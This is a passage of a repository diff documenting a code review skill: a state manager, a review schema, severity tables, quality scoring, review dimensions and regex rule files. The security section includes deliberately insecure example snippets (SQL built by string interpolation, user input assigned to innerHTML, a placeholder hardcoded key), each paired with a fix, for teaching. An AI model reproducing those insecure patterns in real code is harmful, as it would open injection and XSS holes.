* @returns {string|null} - Next dimension or null if all reviewed
*/
function getNextDimension(state) {
const dimensions = ['correctness', 'security', 'performance', 'readability', 'testing', 'architecture'];
const reviewed = state.reviewed_dimensions || [];
for (const dim of dimensions) {
if (!reviewed.includes(dim)) {
return dim;
}
}
return null;
}
```
### addFinding(workDir, finding)
Add a new finding to the state.
```javascript
/**
* Add a finding to the appropriate dimension
* @param {string} workDir - Working directory path
* @param {object} finding - Finding object (must include dimension field)
* @returns {object} - Updated state
*/
function addFinding(workDir, finding) {
if (!finding.dimension) {
throw new Error('Finding must have a dimension field');
}
const state = getState(workDir);
const dimension = finding.dimension;
// Generate ID if not provided
if (!finding.id) {
const prefixes = {
correctness: 'CORR',
readability: 'READ',
performance: 'PERF',
security: 'SEC',
testing: 'TEST',
architecture: 'ARCH'
};
const prefix = prefixes[dimension] || 'MISC';
const count = (state.findings[dimension]?.length || 0) + 1;
finding.id = `${prefix}-${String(count).padStart(3, '0')}`;
}
const currentFindings = state.findings[dimension] || [];
return updateState(workDir, {
findings: {
...state.findings,
[dimension]: [...currentFindings, finding]
}
});
}
```
### markDimensionComplete(workDir, dimension)
Mark a dimension as reviewed.
```javascript
/**
* Mark a dimension as reviewed
* @param {string} workDir - Working directory path
* @param {string} dimension - Dimension name
* @returns {object} - Updated state
*/
function markDimensionComplete(workDir, dimension) {
const state = getState(workDir);
const reviewed = state.reviewed_dimensions || [];
if (reviewed.includes(dimension)) {
console.warn(`[StateManager] Dimension ${dimension} already marked as reviewed`);
return state;
}
return updateState(workDir, {
reviewed_dimensions: [...reviewed, dimension],
current_dimension: null
});
}
```
### recordError(workDir, action, message)
Record an error in state.
```javascript
/**
* Record an execution error
* @param {string} workDir - Working directory path
* @param {string} action - Action that failed
* @param {string} message - Error message
* @returns {object} - Updated state
*/
function recordError(workDir, action, message) {
const state = getState(workDir);
const errors = state.errors || [];
const errorCount = (state.error_count || 0) + 1;
const newError = {
action,
message,
timestamp: new Date().toISOString()
};
const newState = updateState(workDir, {
errors: [...errors, newError],
error_count: errorCount
});
// Auto-fail if error count exceeds threshold
if (errorCount >= 3) {
return updateState(workDir, {
status: 'failed'
});
}
return newState;
}
```
## Usage Examples
### Initialize and Run Review
```javascript
// Initialize new review session
const workDir = '/path/to/review-session';
const state = initState(workDir);
// Update status to running
updateState(workDir, { status: 'running' });
// After collecting context
updateState(workDir, {
context: {
target_path: '/src/auth',
files: ['auth.ts', 'login.ts'],
language: 'typescript',
total_lines: 500,
file_count: 2
}
});
// After completing quick scan
updateState(workDir, {
scan_completed: true,
scan_summary: {
risk_areas: [{ file: 'auth.ts', reason: 'Complex logic', priority: 'high' }],
complexity_score: 7.5,
quick_issues: []
}
});
```
### Add Findings During Review
```javascript
// Add a security finding
addFinding(workDir, {
dimension: 'security',
severity: 'high',
category: 'injection',
file: 'auth.ts',
line: 45,
description: 'SQL injection vulnerability',
recommendation: 'Use parameterized queries'
});
// Mark dimension complete
markDimensionComplete(workDir, 'security');
```
### Error Handling with Rollback
```javascript
try {
updateState(workDir, {
status: 'running',
current_action: 'deep-review'
});
// ... do review work ...
} catch (error) {
// Record error
recordError(workDir, 'deep-review', error.message);
// If needed, restore from backup
restoreState(workDir);
}
```
### Check Review Progress
```javascript
const state = getState(workDir);
const nextDim = getNextDimension(state);
if (nextDim) {
console.log(`Next dimension to review: ${nextDim}`);
updateState(workDir, { current_dimension: nextDim });
} else {
console.log('All dimensions reviewed');
}
```
## Integration with Orchestrator
Update the orchestrator to use StateManager:
```javascript
// In orchestrator.md - Replace direct state operations with StateManager calls
// OLD:
const state = JSON.parse(Read(`${workDir}/state.json`));
// NEW:
const state = getState(workDir);
// OLD:
function updateState(updates) {
const state = JSON.parse(Read(`${workDir}/state.json`));
const newState = { ...state, ...updates, updated_at: new Date().toISOString() };
Write(`${workDir}/state.json`, JSON.stringify(newState, null, 2));
return newState;
}
// NEW:
// Import from state-manager.md
// updateState(workDir, updates) - handles atomic write, backup, validation
// Error handling - OLD:
updateState({
errors: [...(state.errors || []), { action: actionId, message: error.message, timestamp: new Date().toISOString() }],
error_count: (state.error_count || 0) + 1
});
// Error handling - NEW:
recordError(workDir, actionId, error.message);
```
## State History Format
The `state-history.json` file tracks all state changes:
```json
{
"entries": [
{
"timestamp": "2024-01-01T10:00:00.000Z",
"action": "init",
"changes": { "type": "initialize", "status": "pending" }
},
{
"timestamp": "2024-01-01T10:01:00.000Z",
"action": "update",
"changes": {
"status": { "from": "pending", "to": "running" },
"current_action": { "from": null, "to": "action-collect-context" }
}
},
{
"timestamp": "2024-01-01T10:05:00.000Z",
"action": "restore",
"changes": { "source": "/path/state.backup.json" }
}
]
}
```
## Error Recovery Strategies
| Scenario | Strategy | Function |
|----------|----------|----------|
| State file corrupted | Restore from backup | `restoreState(workDir)` |
| Invalid state after update | Auto-rollback (built-in) | N/A (automatic) |
| Multiple errors | Auto-fail after 3 | `recordError()` |
| Need to retry from checkpoint | Restore specific backup | `restoreState(workDir, backupPath)` |
| Review interrupted | Resume from saved state | `getState(workDir)` |
## Best Practices
1. **Always use `updateState()`** - Never write directly to state.json
2. **Check validation warnings** - Warnings may indicate data issues
3. **Use convenience functions** - `addFinding()`, `markDimensionComplete()`, etc.
4. **Monitor history** - Check state-history.json for debugging
5. **Create named backups** - Before major operations: `backupState(workDir, 'pre-deep-review')`

View File

@@ -0,0 +1,174 @@
# State Schema
Code Review 状态结构定义。
## Schema Definition
```typescript
interface ReviewState {
// === 元数据 ===
status: 'pending' | 'running' | 'completed' | 'failed' | 'user_exit';
started_at: string; // ISO timestamp
updated_at: string; // ISO timestamp
completed_at?: string; // ISO timestamp
// === 审查目标 ===
context: {
target_path: string; // 目标路径(文件或目录)
files: string[]; // 待审查文件列表
language: string; // 主要编程语言
framework?: string; // 框架(如有)
total_lines: number; // 总代码行数
file_count: number; // 文件数量
};
// === 扫描结果 ===
scan_completed: boolean;
scan_summary: {
risk_areas: RiskArea[]; // 高风险区域
complexity_score: number; // 复杂度评分
quick_issues: QuickIssue[]; // 快速发现的问题
};
// === 审查进度 ===
reviewed_dimensions: string[]; // 已完成的审查维度
current_dimension?: string; // 当前审查维度
// === 发现的问题 ===
findings: {
correctness: Finding[];
readability: Finding[];
performance: Finding[];
security: Finding[];
testing: Finding[];
architecture: Finding[];
};
// === 报告状态 ===
report_generated: boolean;
report_path?: string;
// === 执行跟踪 ===
current_action?: string;
completed_actions: string[];
errors: ExecutionError[];
error_count: number;
// === 统计信息 ===
summary?: {
total_issues: number;
critical: number;
high: number;
medium: number;
low: number;
info: number;
review_duration_ms: number;
};
}
interface RiskArea {
file: string;
reason: string;
priority: 'high' | 'medium' | 'low';
}
interface QuickIssue {
type: string;
file: string;
line?: number;
message: string;
}
interface Finding {
id: string; // 唯一标识 e.g., "CORR-001"
severity: 'critical' | 'high' | 'medium' | 'low' | 'info';
dimension: string; // 所属维度
category: string; // 问题类别
file: string; // 文件路径
line?: number; // 行号
column?: number; // 列号
code_snippet?: string; // 问题代码片段
description: string; // 问题描述
recommendation: string; // 修复建议
fix_example?: string; // 修复示例代码
references?: string[]; // 参考资料链接
}
interface ExecutionError {
action: string;
message: string;
timestamp: string;
}
```
## Initial State
```json
{
"status": "pending",
"started_at": "2024-01-01T00:00:00.000Z",
"updated_at": "2024-01-01T00:00:00.000Z",
"context": null,
"scan_completed": false,
"scan_summary": null,
"reviewed_dimensions": [],
"current_dimension": null,
"findings": {
"correctness": [],
"readability": [],
"performance": [],
"security": [],
"testing": [],
"architecture": []
},
"report_generated": false,
"report_path": null,
"current_action": null,
"completed_actions": [],
"errors": [],
"error_count": 0,
"summary": null
}
```
## State Transitions
```mermaid
stateDiagram-v2
[*] --> pending: Initialize
pending --> running: collect-context
running --> running: quick-scan
running --> running: deep-review (6x)
running --> running: generate-report
running --> completed: complete
running --> failed: error_count >= 3
running --> user_exit: User abort
completed --> [*]
failed --> [*]
user_exit --> [*]
```
## Dimension Review Order
1. **correctness** - 正确性(最高优先级)
2. **security** - 安全性(关键)
3. **performance** - 性能
4. **readability** - 可读性
5. **testing** - 测试覆盖
6. **architecture** - 架构一致性
## Finding ID Format
```
{DIMENSION_PREFIX}-{SEQUENCE}
Prefixes:
- CORR: Correctness
- READ: Readability
- PERF: Performance
- SEC: Security
- TEST: Testing
- ARCH: Architecture
Example: SEC-003 = Security issue #3
```

View File

@@ -0,0 +1,228 @@
# Issue Classification
问题分类和严重程度标准。
## When to Use
| Phase | Usage | Section |
|-------|-------|---------|
| action-deep-review | 确定问题严重程度 | Severity Levels |
| action-generate-report | 问题分类展示 | Category Mapping |
---
## Severity Levels
### Critical (严重) 🔴
**定义**: 必须在合并前修复的阻塞性问题
**标准**:
- 安全漏洞 (可被利用)
- 数据损坏或丢失风险
- 系统崩溃风险
- 生产环境重大故障
**示例**:
- SQL/XSS/命令注入
- 硬编码密钥泄露
- 未捕获的异常导致崩溃
- 数据库事务未正确处理
**响应**: 必须立即修复,阻塞合并
---
### High (高) 🟠
**定义**: 应在合并前修复的重要问题
**标准**:
- 功能缺陷
- 重要边界条件未处理
- 性能严重退化
- 资源泄漏
**示例**:
- 核心业务逻辑错误
- 内存泄漏
- N+1 查询问题
- 缺少必要的错误处理
**响应**: 强烈建议修复
---
### Medium (中) 🟡
**定义**: 建议修复的代码质量问题
**标准**:
- 代码可维护性问题
- 轻微性能问题
- 测试覆盖不足
- 不符合团队规范
**示例**:
- 函数过长
- 命名不清晰
- 缺少注释
- 代码重复
**响应**: 建议在后续迭代修复
---
### Low (低) 🔵
**定义**: 可选优化的问题
**标准**:
- 风格问题
- 微小优化
- 可读性改进
**示例**:
- 变量声明顺序
- 额外的空行
- 可以更简洁的写法
**响应**: 可根据团队偏好处理
---
### Info (信息) ⚪
**定义**: 信息性建议,非问题
**标准**:
- 学习机会
- 替代方案建议
- 文档完善建议
**示例**:
- "这里可以考虑使用新的 API"
- "建议添加 JSDoc 注释"
- "可以参考 xxx 模式"
**响应**: 仅供参考
---
## Category Mapping
### By Dimension
| Dimension | Common Categories |
|-----------|-------------------|
| Correctness | `null-check`, `boundary`, `error-handling`, `type-safety`, `logic-error` |
| Security | `injection`, `xss`, `hardcoded-secret`, `auth`, `sensitive-data` |
| Performance | `complexity`, `n+1-query`, `memory-leak`, `blocking-io`, `inefficient-algorithm` |
| Readability | `naming`, `function-length`, `complexity`, `comments`, `duplication` |
| Testing | `coverage`, `boundary-test`, `mock-abuse`, `test-isolation` |
| Architecture | `layer-violation`, `circular-dependency`, `coupling`, `srp-violation` |
### Category Details
#### Correctness Categories
| Category | Description | Default Severity |
|----------|-------------|------------------|
| `null-check` | 缺少空值检查 | High |
| `boundary` | 边界条件未处理 | High |
| `error-handling` | 错误处理不当 | High |
| `type-safety` | 类型安全问题 | Medium |
| `logic-error` | 逻辑错误 | Critical/High |
| `resource-leak` | 资源泄漏 | High |
#### Security Categories
| Category | Description | Default Severity |
|----------|-------------|------------------|
| `injection` | 注入风险 (SQL/Command) | Critical |
| `xss` | 跨站脚本风险 | Critical |
| `hardcoded-secret` | 硬编码密钥 | Critical |
| `auth` | 认证授权问题 | High |
| `sensitive-data` | 敏感数据暴露 | High |
| `insecure-dependency` | 不安全依赖 | Medium |
#### Performance Categories
| Category | Description | Default Severity |
|----------|-------------|------------------|
| `complexity` | 高算法复杂度 | Medium |
| `n+1-query` | N+1 查询问题 | High |
| `memory-leak` | 内存泄漏 | High |
| `blocking-io` | 阻塞 I/O | Medium |
| `inefficient-algorithm` | 低效算法 | Medium |
| `missing-cache` | 缺少缓存 | Low |
#### Readability Categories
| Category | Description | Default Severity |
|----------|-------------|------------------|
| `naming` | 命名问题 | Medium |
| `function-length` | 函数过长 | Medium |
| `nesting-depth` | 嵌套过深 | Medium |
| `comments` | 注释问题 | Low |
| `duplication` | 代码重复 | Medium |
| `magic-number` | 魔法数字 | Low |
#### Testing Categories
| Category | Description | Default Severity |
|----------|-------------|------------------|
| `coverage` | 测试覆盖不足 | Medium |
| `boundary-test` | 缺少边界测试 | Medium |
| `mock-abuse` | Mock 过度使用 | Low |
| `test-isolation` | 测试不独立 | Medium |
| `flaky-test` | 不稳定测试 | High |
#### Architecture Categories
| Category | Description | Default Severity |
|----------|-------------|------------------|
| `layer-violation` | 层次违规 | Medium |
| `circular-dependency` | 循环依赖 | High |
| `coupling` | 耦合过紧 | Medium |
| `srp-violation` | 单一职责违规 | Medium |
| `god-class` | 上帝类 | High |
---
## Finding ID Format
```
{PREFIX}-{NNN}
Prefixes by Dimension:
- CORR: Correctness
- SEC: Security
- PERF: Performance
- READ: Readability
- TEST: Testing
- ARCH: Architecture
Examples:
- SEC-001: First security finding
- CORR-015: 15th correctness finding
```
---
## Quality Gates
| Gate | Condition | Action |
|------|-----------|--------|
| **Block** | Critical > 0 | 禁止合并 |
| **Warn** | High > 0 | 需要审批 |
| **Pass** | Critical = 0, High = 0 | 允许合并 |
### Recommended Thresholds
| Metric | Ideal | Acceptable | Needs Work |
|--------|-------|------------|------------|
| Critical | 0 | 0 | Any > 0 |
| High | 0 | ≤ 2 | > 2 |
| Medium | ≤ 5 | ≤ 10 | > 10 |
| Total | ≤ 10 | ≤ 20 | > 20 |

View File

@@ -0,0 +1,214 @@
# Quality Standards
代码审查质量标准。
## When to Use
| Phase | Usage | Section |
|-------|-------|---------|
| action-generate-report | 质量评估 | Quality Dimensions |
| action-complete | 最终评分 | Quality Gates |
---
## Quality Dimensions
### 1. Completeness (完整性) - 25%
**评估审查覆盖的完整程度**
| Score | Criteria |
|-------|----------|
| 100% | 所有维度审查完成,所有高风险文件检查 |
| 80% | 核心维度完成,主要文件检查 |
| 60% | 部分维度完成 |
| < 60% | 审查不完整 |
**检查点**:
- [ ] 6 个维度全部审查
- [ ] 高风险区域重点检查
- [ ] 关键文件覆盖
---
### 2. Accuracy (准确性) - 25%
**评估发现问题的准确程度**
| Score | Criteria |
|-------|----------|
| 100% | 问题定位准确,分类正确,无误报 |
| 80% | 偶有分类偏差,定位准确 |
| 60% | 存在误报或漏报 |
| < 60% | 准确性差 |
**检查点**:
- [ ] 问题行号准确
- [ ] 严重程度合理
- [ ] 分类正确
---
### 3. Actionability (可操作性) - 25%
**评估建议的实用程度**
| Score | Criteria |
|-------|----------|
| 100% | 每个问题都有具体可执行的修复建议 |
| 80% | 大部分问题有清晰建议 |
| 60% | 建议较笼统 |
| < 60% | 缺乏可操作建议 |
**检查点**:
- [ ] 提供具体修复建议
- [ ] 包含代码示例
- [ ] 说明修复优先级
---
### 4. Consistency (一致性) - 25%
**评估审查标准的一致程度**
| Score | Criteria |
|-------|----------|
| 100% | 相同问题相同处理,标准统一 |
| 80% | 基本一致,偶有差异 |
| 60% | 标准不太统一 |
| < 60% | 标准混乱 |
**检查点**:
- [ ] ID 格式统一
- [ ] 严重程度标准一致
- [ ] 描述风格统一
---
## Quality Gates
### Review Quality Gate
| Gate | Overall Score | Action |
|------|---------------|--------|
| **Excellent** | ≥ 90% | 高质量审查 |
| **Good** | ≥ 80% | 合格审查 |
| **Acceptable** | ≥ 70% | 基本可接受 |
| **Needs Improvement** | < 70% | 需要改进 |
### Code Quality Gate (Based on Findings)
| Gate | Condition | Recommendation |
|------|-----------|----------------|
| **Block** | Critical > 0 | 禁止合并,必须修复 |
| **Warn** | High > 3 | 需要团队讨论 |
| **Caution** | Medium > 10 | 建议改进 |
| **Pass** | 其他 | 可以合并 |
---
## Report Quality Checklist
### Structure
- [ ] 包含审查概览
- [ ] 包含问题统计
- [ ] 包含高风险区域
- [ ] 包含问题详情
- [ ] 包含修复建议
### Content
- [ ] 问题描述清晰
- [ ] 文件位置准确
- [ ] 代码片段有效
- [ ] 修复建议具体
- [ ] 优先级明确
### Format
- [ ] Markdown 格式正确
- [ ] 表格对齐
- [ ] 代码块语法正确
- [ ] 链接有效
- [ ] 无拼写错误
---
## Validation Function
```javascript
function validateReviewQuality(state) {
const scores = {
completeness: 0,
accuracy: 0,
actionability: 0,
consistency: 0
};
// 1. Completeness
const dimensionsReviewed = state.reviewed_dimensions?.length || 0;
scores.completeness = (dimensionsReviewed / 6) * 100;
// 2. Accuracy (需要人工验证或后续反馈)
// 暂时基于有无错误来估算
scores.accuracy = state.error_count === 0 ? 100 : Math.max(0, 100 - state.error_count * 20);
// 3. Actionability
const findings = Object.values(state.findings).flat();
const withRecommendations = findings.filter(f => f.recommendation).length;
scores.actionability = findings.length > 0
? (withRecommendations / findings.length) * 100
: 100;
// 4. Consistency (检查 ID 格式等)
const validIds = findings.filter(f => /^(CORR|SEC|PERF|READ|TEST|ARCH)-\d{3}$/.test(f.id)).length;
scores.consistency = findings.length > 0
? (validIds / findings.length) * 100
: 100;
// Overall
const overall = (
scores.completeness * 0.25 +
scores.accuracy * 0.25 +
scores.actionability * 0.25 +
scores.consistency * 0.25
);
return {
scores,
overall,
gate: overall >= 90 ? 'excellent' :
overall >= 80 ? 'good' :
overall >= 70 ? 'acceptable' : 'needs_improvement'
};
}
```
---
## Improvement Recommendations
### If Completeness is Low
- 增加扫描的文件范围
- 确保所有维度都被审查
- 重点关注高风险区域
### If Accuracy is Low
- 提高规则精度
- 减少误报
- 验证行号准确性
### If Actionability is Low
- 为每个问题添加修复建议
- 提供代码示例
- 说明修复步骤
### If Consistency is Low
- 统一 ID 格式
- 标准化严重程度判定
- 使用模板化描述

View File

@@ -0,0 +1,337 @@
# Review Dimensions
代码审查维度定义和检查点规范。
## When to Use
| Phase | Usage | Section |
|-------|-------|---------|
| action-deep-review | 获取维度检查规则 | All |
| action-generate-report | 维度名称映射 | Dimension Names |
---
## Dimension Overview
| Dimension | Weight | Focus | Key Indicators |
|-----------|--------|-------|----------------|
| **Correctness** | 25% | 功能正确性 | 边界条件、错误处理、类型安全 |
| **Security** | 25% | 安全风险 | 注入攻击、敏感数据、权限 |
| **Performance** | 15% | 执行效率 | 算法复杂度、资源使用 |
| **Readability** | 15% | 可维护性 | 命名、结构、注释 |
| **Testing** | 10% | 测试质量 | 覆盖率、边界测试 |
| **Architecture** | 10% | 架构一致性 | 分层、依赖、模式 |
---
## 1. Correctness (正确性)
### 检查清单
- [ ] **边界条件处理**
- 空数组/空字符串
- Null/Undefined
- 数值边界 (0, 负数, MAX_INT)
- 集合边界 (首元素, 末元素)
- [ ] **错误处理**
- Try-catch 覆盖
- 错误不被静默吞掉
- 错误信息有意义
- 资源正确释放
- [ ] **类型安全**
- 类型转换正确
- 避免隐式转换
- TypeScript strict mode
- [ ] **逻辑完整性**
- If-else 分支完整
- Switch 有 default
- 循环终止条件正确
### 常见问题模式
```javascript
// ❌ 问题: 未检查 null
function getName(user) {
return user.name.toUpperCase(); // user 可能为 null
}
// ✅ 修复
function getName(user) {
return user?.name?.toUpperCase() ?? 'Unknown';
}
// ❌ 问题: 空 catch 块
try {
await fetchData();
} catch (e) {} // 错误被静默吞掉
// ✅ 修复
try {
await fetchData();
} catch (e) {
console.error('Failed to fetch data:', e);
throw e;
}
```
---
## 2. Security (安全性)
### 检查清单
- [ ] **注入防护**
- SQL 注入 (使用参数化查询)
- XSS (避免 innerHTML)
- 命令注入 (避免 exec)
- 路径遍历
- [ ] **认证授权**
- 权限检查完整
- Token 验证
- Session 管理
- [ ] **敏感数据**
- 无硬编码密钥
- 日志不含敏感信息
- 传输加密
- [ ] **依赖安全**
- 无已知漏洞依赖
- 版本锁定
### 常见问题模式
```javascript
// ❌ 问题: SQL 注入风险
const query = `SELECT * FROM users WHERE id = ${userId}`;
// ✅ 修复: 参数化查询
const query = `SELECT * FROM users WHERE id = ?`;
db.query(query, [userId]);
// ❌ 问题: XSS 风险
element.innerHTML = userInput;
// ✅ 修复
element.textContent = userInput;
// ❌ 问题: 硬编码密钥
const apiKey = 'sk-xxxxxxxxxxxx';
// ✅ 修复
const apiKey = process.env.API_KEY;
```
---
## 3. Performance (性能)
### 检查清单
- [ ] **算法复杂度**
- 避免 O(n²) 在大数据集
- 使用合适的数据结构
- 避免不必要的循环
- [ ] **I/O 效率**
- 批量操作 vs 循环单条
- 避免 N+1 查询
- 适当使用缓存
- [ ] **资源使用**
- 内存泄漏
- 连接池使用
- 大文件流式处理
- [ ] **异步处理**
- 并行 vs 串行
- Promise.all 使用
- 避免阻塞
### 常见问题模式
```javascript
// ❌ 问题: N+1 查询
for (const user of users) {
const posts = await db.query('SELECT * FROM posts WHERE user_id = ?', [user.id]);
}
// ✅ 修复: 批量查询
const userIds = users.map(u => u.id);
const posts = await db.query('SELECT * FROM posts WHERE user_id IN (?)', [userIds]);
// ❌ 问题: 串行执行可并行操作
const a = await fetchA();
const b = await fetchB();
const c = await fetchC();
// ✅ 修复: 并行执行
const [a, b, c] = await Promise.all([fetchA(), fetchB(), fetchC()]);
```
---
## 4. Readability (可读性)
### 检查清单
- [ ] **命名规范**
- 变量名见名知意
- 函数名表达动作
- 常量使用 UPPER_CASE
- 避免缩写和单字母
- [ ] **函数设计**
- 单一职责
- 长度 < 50 行
- 参数 < 5 个
- 嵌套 < 4 层
- [ ] **代码组织**
- 逻辑分组
- 空行分隔
- Import 顺序
- [ ] **注释质量**
- 解释 WHY 而非 WHAT
- 及时更新
- 无冗余注释
### 常见问题模式
```javascript
// ❌ 问题: 命名不清晰
const d = new Date();
const a = users.filter(x => x.s === 'active');
// ✅ 修复
const currentDate = new Date();
const activeUsers = users.filter(user => user.status === 'active');
// ❌ 问题: 函数过长、职责过多
function processOrder(order) {
// ... 200 行代码,包含验证、计算、保存、通知
}
// ✅ 修复: 拆分职责
function validateOrder(order) { /* ... */ }
function calculateTotal(order) { /* ... */ }
function saveOrder(order) { /* ... */ }
function notifyCustomer(order) { /* ... */ }
```
---
## 5. Testing (测试)
### 检查清单
- [ ] **测试覆盖**
- 核心逻辑有测试
- 边界条件有测试
- 错误路径有测试
- [ ] **测试质量**
- 测试独立
- 断言明确
- Mock 适度
- [ ] **测试可维护性**
- 命名清晰
- 结构统一
- 避免重复
### 常见问题模式
```javascript
// ❌ 问题: 测试不独立
let counter = 0;
test('increment', () => {
counter++; // 依赖外部状态
expect(counter).toBe(1);
});
// ✅ 修复: 每个测试独立
test('increment', () => {
const counter = new Counter();
counter.increment();
expect(counter.value).toBe(1);
});
// ❌ 问题: 缺少边界测试
test('divide', () => {
expect(divide(10, 2)).toBe(5);
});
// ✅ 修复: 包含边界情况
test('divide by zero throws', () => {
expect(() => divide(10, 0)).toThrow();
});
```
---
## 6. Architecture (架构)
### 检查清单
- [ ] **分层结构**
- 层次清晰
- 依赖方向正确
- 无循环依赖
- [ ] **模块化**
- 高内聚低耦合
- 接口定义清晰
- 职责单一
- [ ] **设计模式**
- 使用合适的模式
- 避免过度设计
- 遵循项目既有模式
### 常见问题模式
```javascript
// ❌ 问题: 层次混乱 (Controller 直接操作数据库)
class UserController {
async getUser(req, res) {
const user = await db.query('SELECT * FROM users WHERE id = ?', [req.params.id]);
res.json(user);
}
}
// ✅ 修复: 分层清晰
class UserController {
constructor(private userService: UserService) {}
async getUser(req, res) {
const user = await this.userService.findById(req.params.id);
res.json(user);
}
}
// ❌ 问题: 循环依赖
// moduleA.ts
import { funcB } from './moduleB';
// moduleB.ts
import { funcA } from './moduleA';
// ✅ 修复: 提取共享模块或使用依赖注入
```
---
## Severity Mapping
| Severity | Criteria |
|----------|----------|
| **Critical** | 安全漏洞、数据损坏风险、崩溃风险 |
| **High** | 功能缺陷、性能严重问题、重要边界未处理 |
| **Medium** | 代码质量问题、可维护性问题 |
| **Low** | 风格问题、优化建议 |
| **Info** | 信息性建议、学习机会 |

View File

@@ -0,0 +1,63 @@
{
"dimension": "architecture",
"prefix": "ARCH",
"description": "Rules for detecting architecture issues including coupling, layering, and design patterns",
"rules": [
{
"id": "circular-dependency",
"category": "dependency",
"severity": "high",
"pattern": "import\\s+.*from\\s+['\"]\\.\\..*['\"]",
"patternType": "regex",
"contextPattern": "export.*import.*from.*same-module",
"description": "Potential circular dependency detected. Circular imports cause initialization issues and tight coupling",
"recommendation": "Extract shared code to a separate module, use dependency injection, or restructure the dependency graph",
"fixExample": "// Before - A imports B, B imports A\n// moduleA.ts\nimport { funcB } from './moduleB';\nexport const funcA = () => funcB();\n\n// moduleB.ts\nimport { funcA } from './moduleA'; // circular!\n\n// After - extract shared logic\n// shared.ts\nexport const sharedLogic = () => { ... };\n\n// moduleA.ts\nimport { sharedLogic } from './shared';"
},
{
"id": "god-class",
"category": "single-responsibility",
"severity": "high",
"pattern": "class\\s+\\w+\\s*\\{",
"patternType": "regex",
"methodThreshold": 15,
"lineThreshold": 300,
"description": "Class with too many methods or lines violates single responsibility principle",
"recommendation": "Split into smaller, focused classes. Each class should have one reason to change",
"fixExample": "// Before - UserManager handles everything\nclass UserManager {\n createUser() { ... }\n updateUser() { ... }\n sendEmail() { ... }\n generateReport() { ... }\n validatePassword() { ... }\n}\n\n// After - separated concerns\nclass UserRepository { create, update, delete }\nclass EmailService { sendEmail }\nclass ReportGenerator { generate }\nclass PasswordValidator { validate }"
},
{
"id": "layer-violation",
"category": "layering",
"severity": "high",
"pattern": "import.*(?:repository|database|sql|prisma|mongoose).*from",
"patternType": "regex",
"contextPath": ["controller", "handler", "route", "component"],
"description": "Direct database access from presentation layer violates layered architecture",
"recommendation": "Access data through service/use-case layer. Keep controllers thin and delegate to services",
"fixExample": "// Before - controller accesses DB directly\nimport { prisma } from './database';\nconst getUsers = async () => prisma.user.findMany();\n\n// After - use service layer\nimport { userService } from './services';\nconst getUsers = async () => userService.getAll();"
},
{
"id": "missing-interface",
"category": "abstraction",
"severity": "medium",
"pattern": "new\\s+\\w+Service\\(|new\\s+\\w+Repository\\(",
"patternType": "regex",
"negativePatterns": ["interface", "implements", "inject"],
"description": "Direct instantiation of services/repositories creates tight coupling",
"recommendation": "Define interfaces and use dependency injection for loose coupling and testability",
"fixExample": "// Before - tight coupling\nclass OrderService {\n private repo = new OrderRepository();\n}\n\n// After - loose coupling\ninterface IOrderRepository {\n findById(id: string): Promise<Order>;\n}\n\nclass OrderService {\n constructor(private repo: IOrderRepository) {}\n}"
},
{
"id": "mixed-concerns",
"category": "separation-of-concerns",
"severity": "medium",
"pattern": "fetch\\s*\\(|axios\\.|http\\.",
"patternType": "regex",
"contextPath": ["component", "view", "page"],
"description": "Network calls in UI components mix data fetching with presentation",
"recommendation": "Extract data fetching to hooks, services, or state management layer",
"fixExample": "// Before - fetch in component\nfunction UserList() {\n const [users, setUsers] = useState([]);\n useEffect(() => {\n fetch('/api/users').then(r => r.json()).then(setUsers);\n }, []);\n}\n\n// After - custom hook\nfunction useUsers() {\n return useQuery('users', () => userService.getAll());\n}\n\nfunction UserList() {\n const { data: users } = useUsers();\n}"
}
]
}

View File

@@ -0,0 +1,60 @@
{
"dimension": "correctness",
"prefix": "CORR",
"description": "Rules for detecting logical errors, null handling, and error handling issues",
"rules": [
{
"id": "null-check",
"category": "null-check",
"severity": "high",
"pattern": "\\w+\\.\\w+(?!\\.?\\?)",
"patternType": "regex",
"negativePatterns": ["\\?\\.", "if\\s*\\(", "!==?\\s*null", "!==?\\s*undefined", "&&\\s*\\w+\\."],
"description": "Property access without null/undefined check may cause runtime errors",
"recommendation": "Add null/undefined check before accessing properties using optional chaining or conditional checks",
"fixExample": "// Before\nobj.property.value\n\n// After\nobj?.property?.value\n// or\nif (obj && obj.property) { obj.property.value }"
},
{
"id": "empty-catch",
"category": "empty-catch",
"severity": "high",
"pattern": "catch\\s*\\([^)]*\\)\\s*\\{\\s*\\}",
"patternType": "regex",
"description": "Empty catch block silently swallows errors, hiding bugs and making debugging difficult",
"recommendation": "Log the error, rethrow it, or handle it appropriately. Never silently ignore exceptions",
"fixExample": "// Before\ncatch (e) { }\n\n// After\ncatch (e) {\n console.error('Operation failed:', e);\n throw e; // or handle appropriately\n}"
},
{
"id": "unreachable-code",
"category": "unreachable-code",
"severity": "medium",
"pattern": "return\\s+[^;]+;\\s*\\n\\s*[^}\\s]",
"patternType": "regex",
"description": "Code after return statement is unreachable and will never execute",
"recommendation": "Remove unreachable code or restructure the logic to ensure all code paths are accessible",
"fixExample": "// Before\nfunction example() {\n return value;\n doSomething(); // unreachable\n}\n\n// After\nfunction example() {\n doSomething();\n return value;\n}"
},
{
"id": "array-index-unchecked",
"category": "boundary-check",
"severity": "high",
"pattern": "\\[\\d+\\]|\\[\\w+\\](?!\\s*[!=<>])",
"patternType": "regex",
"negativePatterns": ["\\.length", "Array\\.isArray", "\\?.\\["],
"description": "Array index access without boundary check may cause undefined access or out-of-bounds errors",
"recommendation": "Check array length or use optional chaining before accessing array elements",
"fixExample": "// Before\nconst item = arr[index];\n\n// After\nconst item = arr?.[index];\n// or\nconst item = index < arr.length ? arr[index] : defaultValue;"
},
{
"id": "comparison-type-coercion",
"category": "type-safety",
"severity": "medium",
"pattern": "[^!=]==[^=]|[^!]==[^=]",
"patternType": "regex",
"negativePatterns": ["===", "!=="],
"description": "Using == instead of === can lead to unexpected type coercion",
"recommendation": "Use strict equality (===) to avoid implicit type conversion",
"fixExample": "// Before\nif (value == null)\nif (a == b)\n\n// After\nif (value === null || value === undefined)\nif (a === b)"
}
]
}

View File

@@ -0,0 +1,140 @@
# Code Review Rules Index
This directory contains externalized review rules for the multi-dimensional code review skill.
## Directory Structure
```
rules/
├── index.md # This file
├── correctness-rules.json # CORR - Logic and error handling
├── security-rules.json # SEC - Security vulnerabilities
├── performance-rules.json # PERF - Performance issues
├── readability-rules.json # READ - Code clarity
├── testing-rules.json # TEST - Test quality
└── architecture-rules.json # ARCH - Design patterns
```
## Rule File Schema
Each rule file follows this JSON schema:
```json
{
"dimension": "string", // Dimension identifier
"prefix": "string", // Finding ID prefix (4 chars)
"description": "string", // Dimension description
"rules": [
{
